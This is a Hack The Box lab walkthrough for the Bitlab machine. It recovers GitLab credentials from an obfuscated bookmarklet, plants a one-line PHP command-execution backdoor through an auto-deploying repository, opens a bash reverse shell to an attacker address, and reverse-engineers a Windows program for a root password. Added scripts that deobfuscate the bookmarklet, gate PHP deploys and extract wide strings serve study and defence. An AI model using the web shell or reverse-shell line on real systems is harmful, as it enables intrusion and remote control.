20. Hack The Box. Level Medium: Bitlab walkthrough. Weak JS obfuscation, GIT and reverse engineering Windows applications

24 December 2024 6 minutes Author: Lady Liberty

Hack The Box is a cybersecurity platform that allows you to test your skills on real-world challenges. In this detailed analysis, we will focus on the Bitlab machine solution, which combines weak JavaScript obfuscation, GitLab, and Windows application reverse engineering.

Bitlab on Hack The Box: JS, GitLab and reverse Windows

This article covers the key stages: weak JavaScript obfuscation, delivering a backdoor through a Git repository, and debugging a 32-bit Windows application.

A VPN is used to connect to the lab. It is not recommended to connect from a work computer or device containing sensitive data, as the private network may include participants with advanced cybersecurity knowledge.

Reconnaissance

Port scanning

The machine has the IP address 10.10.10.114, which we add to /etc/hosts:

10.10.10.114 bitlab.htb

First, a scan of open ports is performed. Since a full scan of all ports with nmap takes a long time, the first step is to use masscan. This tool allows you to quickly scan all TCP and UDP ports from the tun0 interface at a rate of 1000 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.114 --rate=1000

Next, we collect more information about the ports that were found.

nmap -A bitlab.htb -p22,80

According to the nmap report, SSH and a web server are running on the host. A robots.txt file was found on the web server; walking the directories listed in it revealed a running GitLab instance and an unindexed help directory.

Opening the bookmarks page, we find several links.

JS

All links lead to different product pages, except for the last one, which contains not an address, but JavaScript code.

And this code is obfuscated.

javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()

To get more readable code, you can use the following site.

After decoding the escaped strings and substituting the array indices, the bookmarklet reduces to the following two statements.

document.getElementById("user_login").value = "clave";
document.getElementById("user_password").value = "11des0081x";
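The decoding above can be done without an external site. The following script is an added example, not code from the walkthrough or from Hack The Box: it pulls every `var NAME=["\xHH...", ...];` string table out of a bookmarklet, decodes the hex and unicode escapes, replaces each `NAME[i]` reference with the literal it points to, and rewrites `obj["ident"]` as `obj.ident`. The sample input is the bookmarklet quoted above; the function and variable names are my own.

```python
import json
import re

# Sample input: the obfuscated bookmarklet from the page (kept as a raw string so
# the \xHH escapes stay literal, exactly as they appear in the link).
SAMPLE = r'''javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()'''

_ESC = re.compile(r'\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})')
# var NAME = ["...", "...", ...];  (double-quoted literals only, which is what
# this family of obfuscators emits)
_ARRAY = re.compile(r'var\s+(\w+)\s*=\s*\[\s*((?:"(?:[^"\\]|\\.)*"\s*,?\s*)+)\]\s*;')
_STRLIT = re.compile(r'"((?:[^"\\]|\\.)*)"')


def decode_escapes(s: str) -> str:
    """Turn \\xHH and \\uHHHH escapes into the characters they encode."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def extract_arrays(src: str) -> dict:
    """Map each string-table name to its list of decoded entries."""
    tables = {}
    for m in _ARRAY.finditer(src):
        name, body = m.group(1), m.group(2)
        tables[name] = [decode_escapes(lit) for lit in _STRLIT.findall(body)]
    return tables


def deobfuscate(src: str) -> str:
    """Inline every NAME[i] reference and drop the table declarations."""
    tables = extract_arrays(src)
    out = _ARRAY.sub('', src)
    for name, entries in tables.items():
        ref = re.compile(re.escape(name) + r'\[(\d+)\]')
        out = ref.sub(lambda m: json.dumps(entries[int(m.group(1))]), out)
    # obj["ident"] -> obj.ident when ident is a plain identifier, for readability
    return re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r'.\1', out)


if __name__ == "__main__":
    for name, entries in extract_arrays(SAMPLE).items():
        print(name, "=", entries)
    print(deobfuscate(SAMPLE))
```

The output contains the same two assignments shown above; because the table is decoded first, the user name and password appear in the table listing even before the references are inlined, which is why this style of obfuscation gives no real protection to embedded credentials.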

Git

With these credentials, we log in to GitLab. There we find two projects.

We also find a project that implements a database connection; its code contains all the data needed to establish the connection.

After checking the Profile, we don’t find anything interesting.

The Deployer project contains only PHP code.

From the code it is clear that any file placed in the Profile project is automatically deployed to the server.

Entry Point

So we deploy a PHP backdoor that accepts a command and executes it:

<?php $cmd = $_REQUEST['cmd']; system($cmd); die; ?>
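The deployment pipeline on this machine pushes repository content straight to the web root, so the one-liner above goes live the moment it is committed. A gate that a defender would want in such a pipeline is a pre-deploy review of PHP files for command-execution calls fed by request data. The following is an added example of that check, not code from the walkthrough or from GitLab: it finds variables assigned from `$_REQUEST`, `$_GET`, `$_POST` or `$_COOKIE`, then flags `system()`, `exec()` and similar calls whose argument is request-controlled. The two sample files are constructed; the function names are my own.

```python
import re

# Constructed samples: the one-line shell from the walkthrough and a harmless page.
SHELL = "<?php $cmd = $_REQUEST['cmd']; system($cmd); die; ?>"
BENIGN = "<?php echo htmlspecialchars($_GET['name'] ?? 'guest'); ?>"

EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen",
              "proc_open", "eval", "assert")
_USER_INPUT = re.compile(r'\$_(?:REQUEST|GET|POST|COOKIE|FILES)\b')
# func( ... ) for any of the execution functions above; argument text captured
_EXEC_CALL = re.compile(r'\b(' + '|'.join(EXEC_FUNCS) + r')\s*\(\s*([^)]*)\)')
# $var = ... $_REQUEST/... ;  (single '=' only, not '==')
_TAINT_ASSIGN = re.compile(
    r'(\$\w+)\s*=(?!=)\s*[^;]*?\$_(?:REQUEST|GET|POST|COOKIE)\b')


def tainted_variables(src: str) -> set:
    """Variables whose value comes (directly or via an expression) from the request."""
    return {m.group(1) for m in _TAINT_ASSIGN.finditer(src)}


def review_php(src: str) -> list:
    """Return findings, 'HIGH:' when an exec call receives request-controlled input,
    'MEDIUM:' for any other exec call that deserves a human look."""
    tainted = tainted_variables(src)
    findings = []
    for m in _EXEC_CALL.finditer(src):
        func, arg, call = m.group(1), m.group(2), m.group(0)
        direct = _USER_INPUT.search(arg) is not None
        via_var = any(re.search(re.escape(v) + r'\b', arg) for v in tainted)
        if direct or via_var:
            findings.append(f"HIGH: {func}() executes request-controlled input: {call}")
        else:
            findings.append(f"MEDIUM: {func}() call, review argument: {call}")
    return findings


def should_block(src: str) -> bool:
    """True when the file must not be deployed without manual review."""
    return any(f.startswith("HIGH:") for f in review_php(src))


if __name__ == "__main__":
    for label, src in (("shell", SHELL), ("benign", BENIGN)):
        print(label, "->", "BLOCK" if should_block(src) else "allow", review_php(src))
```

This is a syntactic gate, not a full taint analysis: it will miss execution through variable functions or backticks and will over-report when a tainted variable is sanitised before use. Its purpose is to stop the obvious case, a file such as the one above landing in the web root automatically, while a reviewer looks at the rest.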

Open Profile and create a new file.

And after adding, the file will appear in the repository.

Now we test the backdoor.

Through it we spawn a full reverse shell:

bash -i >& /dev/tcp/10.10.15.150/4321 0>&1

We see the connection back to our host.

USER

After gaining access to the host, we verify the previously obtained data, in particular the database credentials. The PHP interpreter is opened in interactive mode, and the code found earlier is used to view the available data. The password, which is stored Base64-encoded, is decoded for further use.

Decoding produced a string that looked like an SSH password, but the login attempt failed: the Base64 text itself is the password.

ROOT

While enumerating the machine, an exe file was found in the user's home directory.

scp [email protected]:~/RemoteConnection.exe .

Next, open the file in IDA Pro. Scrolling through the main function, you can find a comparison of a variable with the username and the creation of a process running PuTTY, a program for network connections.

Presumably the connection is made with authentication data that we need to find. The connection data is passed to PuTTY as a parameter, i.e. in the v3 variable.

The finished string can be viewed in the debugger, but debugging the 32-bit file in IDA is awkward. Step-by-step debugging shows that the comparison happens after the call to GetUserNameW. The steps are then as follows:

A breakpoint is set at the fragment where the name is compared.

Now we set a breakpoint (BP) before loading the parameters for the GetUserNameW function.

Let’s run the program in the debugger. Debugging will stop before calling the desired function.

Now the code is patched: instead of loading the parameters and calling the function, NOP instructions are inserted. This is done with the Keypatch plugin.

Now the code looks like this.

We continue debugging until the name comparison is reached. At this point the address of the parameter string is already loaded into the EAX register, to be passed as a parameter to the ShellExecuteW function.

Now click on the arrow (jump in disassembly) next to the EAX register. This allows you to jump to the address stored in EAX in the main IDA window.

At this address is the parameter string. It visibly represents the correct text "-ssh root…", but each character takes up 2 bytes. To assemble the string conveniently, use the Alt+A key combination.

In this window select Unicode C-Style (16 bit). After that we see the correctly assembled string.
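The "one character per 2 bytes" layout is UTF-16LE, the encoding Windows uses for wide-string APIs such as ShellExecuteW. The same string can be recovered from a memory dump or from the binary on disk without the IDA dialog. The following is an added example, not code from the walkthrough: a small `strings -el` equivalent that pulls printable UTF-16LE runs out of a byte buffer and a filter for PuTTY-style `-ssh` command lines. The byte blob is constructed to mimic the layout described above and carries a placeholder instead of the real connection string; the function names are my own.

```python
import re

# Constructed sample: junk bytes around a UTF-16LE command line with a placeholder.
# PuTTY accepts -ssh and -pw on its command line; the real string from the machine
# is not reproduced here.
SAMPLE_BYTES = (
    b"\x00\x00\x90\x90"
    + "-ssh root@example.invalid -pw PLACEHOLDER".encode("utf-16-le")
    + b"\x00\x00"
    + b"AB"                      # a short byte run that must not be reported as UTF-16
    + b"\x00\x00\xff\xfe"
)


def utf16le_strings(buf: bytes, min_len: int = 4) -> list:
    """Return printable UTF-16LE runs of at least min_len characters.

    Each character is a printable ASCII byte followed by 0x00; the run ends at the
    first byte pair that does not fit that shape (e.g. the 0x0000 terminator)."""
    pattern = re.compile(rb'(?:[\x20-\x7e]\x00){%d,}' % min_len)
    return [m.group(0).decode("utf-16-le") for m in pattern.finditer(buf)]


def ascii_strings(buf: bytes, min_len: int = 4) -> list:
    """Plain 8-bit counterpart, for comparison with what `strings` shows by default."""
    pattern = re.compile(rb'[\x20-\x7e]{%d,}' % min_len)
    return [m.group(0).decode("ascii") for m in pattern.finditer(buf)]


def putty_command_lines(strings: list) -> list:
    """Keep only strings that look like a PuTTY invocation with an -ssh target."""
    return [s for s in strings if s.lstrip().startswith("-ssh ")]


if __name__ == "__main__":
    wide = utf16le_strings(SAMPLE_BYTES)
    print("UTF-16LE:", wide)
    print("ASCII   :", ascii_strings(SAMPLE_BYTES))
    print("PuTTY   :", putty_command_lines(wide))
```

Running the ASCII pass over the same bytes returns nothing, which is exactly the situation described above: a default `strings` run on a Windows binary can miss the interesting text, so always include a wide-character pass when looking for embedded command lines or credentials.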

This string contains the root password. We use it to connect via SSH and get the token.

Conclusion

The analysis of the Bitlab machine showed how a token can be obtained through scanning, exploiting GitLab vulnerabilities, debugging an exe file, and connecting via SSH. This is an example of effective cybersecurity problem solving.
